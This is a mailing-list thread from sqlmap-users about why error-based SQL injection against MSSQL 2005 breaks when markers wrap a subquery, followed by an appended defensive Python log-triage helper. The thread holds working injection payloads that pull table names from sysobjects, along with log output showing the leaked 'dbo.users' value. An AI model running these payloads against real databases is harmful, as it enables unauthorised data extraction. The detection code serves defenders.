hi execute. this was retested at least 100 times.
snippet (against MSSQL 2005):

[12:45:38] [PAYLOAD] 1' AND 5424=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(112)+CHAR(121)+CHAR(58)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(sysusers.name+CHAR(46)+sysobjects.name AS NVARCHAR(4000)),CHAR(32))),1,100) FROM testdb..sysobjects INNER JOIN sysusers ON sysobjects.uid = sysusers.uid WHERE xtype IN (CHAR(117), CHAR(118)) AND sysusers.name+CHAR(46)+sysobjects.name NOT IN (SELECT TOP 2 ISNULL(sysusers.name+CHAR(46)+sysobjects.name,CHAR(32)) FROM testdb..sysobjects INNER JOIN sysusers ON sysobjects.uid = sysusers.uid WHERE xtype IN (CHAR(117), CHAR(118)) ORDER BY 1) ORDER BY 1)+CHAR(58)+CHAR(106)+CHAR(110)+CHAR(116)+CHAR(58))) AND 'vVWe'='vVWe
[12:45:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[12:45:38] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value ':ipy:dbo.users:jnt:' to data type int. <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'

i am not sure what's wrong with your case. you can contact me privately and send me some more info.

kr

On Sat, May 7, 2011 at 7:46 PM, execute <exec...@gmail.com> wrote:
> Hey,
> I'm using the error-based technique for extracting data from an MSSQL server
> (2005 - 9.00.4053.00). It seems like concatenating the sub-query with a string
> doesn't work well - for some reason, the webserver returns the regular
> response for row not found instead of throwing an error.
>
> I tested it manually and found the following:
>
> ') AND 3792=CONVERT(INT,(SELECT TOP 1 name FROM sysobjects WHERE xtype = 'U')) --
> - Works well - throws an error with a table name ("Conversion failed when converting the nvarchar value 'TABLE-NAME' to data type int.")
>
> ') AND 3792=CONVERT(INT,(SELECT TOP 1 'x:' + name FROM sysobjects WHERE xtype = 'U')) --
> - Works well - throws an error with a table name ("Conversion failed when converting the nvarchar value 'x:TABLE-NAME' to data type int.")
>
> ') AND 3792=CONVERT(INT,'x:'+(SELECT TOP 1 name FROM sysobjects WHERE xtype = 'U')) --
> - Doesn't work - just returns 'page not found' (not a 404 error, an error from the script telling that no rows were found)
>
> Can anyone test and confirm this? I'm not quite sure why that happens, but
> it seems like it can easily be fixed by adding the strings inside the
> sub-query (SELECT ':foo'+...+':bar:') instead of outside of it as it does
> now.
> Thanks

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
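As an added example (not code from the thread or from sqlmap), a small Python log-triage helper for the payload shape discussed above: it decodes the CHAR(n)+CHAR(n) runs back into the string literal they build, flags CONVERT(INT,(SELECT ...)) error-based injection whether or not markers are concatenated around the subquery, and, given the ODBC error text the 500 page returned, strips the prefix/suffix markers to show exactly which value was exposed. The sample request parameters and error line are constructed from the thread; all function and constant names are mine.

```python
import re
from typing import Dict, List, Optional

# Constructed request parameters as a WAF or web server would log them (not real
# traffic): sqlmap-style CHAR() payload, a benign request, and the hand-written form.
SAMPLE_QUERIES: List[str] = [
    "id=1' AND 5424=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(112)+CHAR(121)+CHAR(58)"
    "+(SELECT TOP 1 name FROM sysobjects)+CHAR(58)+CHAR(106)+CHAR(110)+CHAR(116)"
    "+CHAR(58))) AND 'vVWe'='vVWe",
    "id=42&page=2",
    "id=1') AND 3792=CONVERT(INT,(SELECT TOP 1 'x:' + name FROM sysobjects WHERE xtype = 'U')) --",
]
# Constructed copy of the ODBC error line quoted in the thread (the leaked response).
SAMPLE_ERROR = ("Conversion failed when converting the nvarchar value "
                "':ipy:dbo.users:jnt:' to data type int.")

CHAR_RUN = re.compile(r"CHAR\(\s*\d+\s*\)(?:\s*\+\s*CHAR\(\s*\d+\s*\))*", re.IGNORECASE)
CHAR_ONE = re.compile(r"CHAR\(\s*(\d+)\s*\)", re.IGNORECASE)
CONVERT_SUBQUERY = re.compile(r"CONVERT\s*\(\s*INT\s*,.*?\bSELECT\b", re.IGNORECASE | re.DOTALL)
MARKERS = re.compile(r"'([^']*)'\s*\+\s*\(\s*SELECT\b.*?\)\s*\+\s*'([^']*)'", re.IGNORECASE | re.DOTALL)
LEAK = re.compile(r"converting the nvarchar value '(.*?)' to data type int", re.IGNORECASE)


def decode_char_runs(sql: str) -> str:
    """Rewrite CHAR(58)+CHAR(105)+... runs into the quoted literal they build."""
    def expand(m: re.Match) -> str:
        text = "".join(chr(int(c)) for c in CHAR_ONE.findall(m.group(0)))
        return "'" + text.replace("'", "''") + "'"
    return CHAR_RUN.sub(expand, sql)


def classify(query: str) -> Dict[str, object]:
    """Flag error-based CONVERT(INT,(SELECT ...)) and recover any prefix/suffix markers."""
    decoded = decode_char_runs(query)
    markers = MARKERS.search(decoded)
    return {
        "decoded": decoded,
        "char_obfuscated": decoded != query,
        "error_based": CONVERT_SUBQUERY.search(decoded) is not None,
        "markers": markers.groups() if markers else None,
    }


def leaked_value(error_text: str, markers: Optional[tuple]) -> Optional[str]:
    """Extract the value the conversion error exposed, minus the injected markers."""
    m = LEAK.search(error_text)
    if not m:
        return None
    value = m.group(1)
    if markers and value.startswith(markers[0]) and value.endswith(markers[1]):
        value = value[len(markers[0]):len(value) - len(markers[1])]
    return value
```

Run `classify` over each logged parameter and `leaked_value` over the matching error response to pair the request with what the database actually returned.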